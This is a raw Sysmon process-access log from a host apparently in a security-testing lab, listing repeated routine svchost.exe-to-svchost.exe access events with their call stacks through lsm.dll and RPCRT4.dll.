12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.317{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.317{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.301{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
